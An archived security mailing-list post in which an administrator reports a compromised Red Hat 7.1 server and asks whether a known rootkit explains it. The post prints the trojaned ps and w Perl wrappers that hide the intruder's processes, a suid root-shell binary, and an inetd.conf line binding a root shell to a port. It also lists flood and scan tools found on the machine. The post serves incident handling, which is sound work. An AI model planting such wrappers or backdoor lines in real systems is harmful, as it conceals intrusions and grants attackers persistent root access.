nouser - rootkit ?

["Dan Uscatu" <duscatu () phenomedia ro>]

 hi
 i found today something funny happening when i tried to install a web
server
 on a customer's machine:
 1. w - returned some weird "/usr/bin/perl" processes
 2. ps - was not showing everything
 3. two connections to some irc servers; fuser - finding the process id's
for
 them, but ps not showing them

 some infos about the server (unfortunately it wasnt installed by me...):
 [root@www root]# uname -a
 Linux www 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknown (compiled in
 the future too, lol)
 [root@www /root]# cat /etc/redhat-release
 Red Hat Linux release 7.1 (Seawolf)

 more digging... so i found some modified files:

 [root@www nouser]# ls -l /bin/ps
 -rwxr-xr-x    1 nouser   nouser        188 Mar  2 15:45 /bin/ps

 [root@www /root]# cat /bin/ps
 #!/usr/bin/perl
 $xargs =join(' ',@ARGV);
 $ps = `/usr/lib/libxnotps $xargs \| grep -v nouser \| grep -v noshell \|
 grep -v proftp \| grep -v \"/bin/ps\" \| grep -v libxnotps`;
 print "$ps";
 [root@www /root]# ls -l /usr/lib/libxnotps
 -r-xr-xr-x    1 root     root        64092 Apr  5  2001 /usr/lib/libxnotps

 [root@www nouser]# ls -l /usr/bin/w
 -rwxr-xr-x    1 nouser   nouser        105 Jan 20 01:03 /usr/bin/w

 [root@www /root]# cat /usr/bin/w
 #!/usr/bin/perl
 $xargs =join(' ',@ARGV);
 $w = `/usr/lib/libxyotps $xargs \| grep -v nouser`;
 print "$w";
 [root@www /root]# ls -l /usr/lib/libxyotps
 -r-xr-xr-x    1 root     root         8688 Apr  5  2001 /usr/lib/libxyotps

 there is another file called /usr/lib/libxzotps, but i couldnt find what is
 pointing at that, yet
 no reference found on the web, searching for "libxnotps" or "libxnotps" or
 "libxzotps"

 [root@www nouser]# grep nouser /etc/passwd
 nouser:x:502:502::/sbin/nouser:/bin/bash

 [root@www nouser]# ls -l /sbin/nouser
 total 3328
-rw-r--r--    1 nouser   nouser      80092 Mar  2 23:22 broadcast-5000.log
-rw-r--r--    1 nouser   nouser    3057793 Mar  2 23:22 broadcast-full.log
drwxr-xr-x    2 nouser   nouser       4096 Mar  2 13:01 Desktop
drwxrwxr-x    4 nouser   nouser       4096 Mar  5 19:23 iroffer
-rw-rw-r--    1 nouser   nouser     206865 Mar  5 19:23 iroffer.tar.gz
-rwsr-xr-x    1 root     root        13855 Mar  2 13:04 nouser
-rw-rw-r--    1 root     root         2215 Mar  2 23:23 packet0r.pl
drwxrwxr-x    3 nouser   nouser       4096 Jan 20 01:15 scan-1
drwxr-xr-x    3 nouser   root         4096 Mar  2 13:04 scan-2
drwxr-xr-x    3 nouser   root         4096 Mar  2 13:04 scan-3
drwxrwxr-x    3 nouser   nouser       4096 Jan 20 01:13 war

 of course the suid "nouser" gives a root shell... and the directories are
full of war scripts, flood tools, and warez... given away through irc bots

i have scanned the machine using chkroot kit... the only funny thing found
was an inetd.conf, containing:

 [root@www nouser]# cat /etc/inetd.conf
65456    stream  tcp     nowait  root  /bin/sh     sh

 of course, inetd is not installed :) that points me to the idea that the
process was somehow automated... but i cant find any reference to a rootkit
that does these changes. seems pretty stupid for a rootkit  anyway... but i
want to be sure no other major changes were made... before i install the
production server there.

thanks for any comments






----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com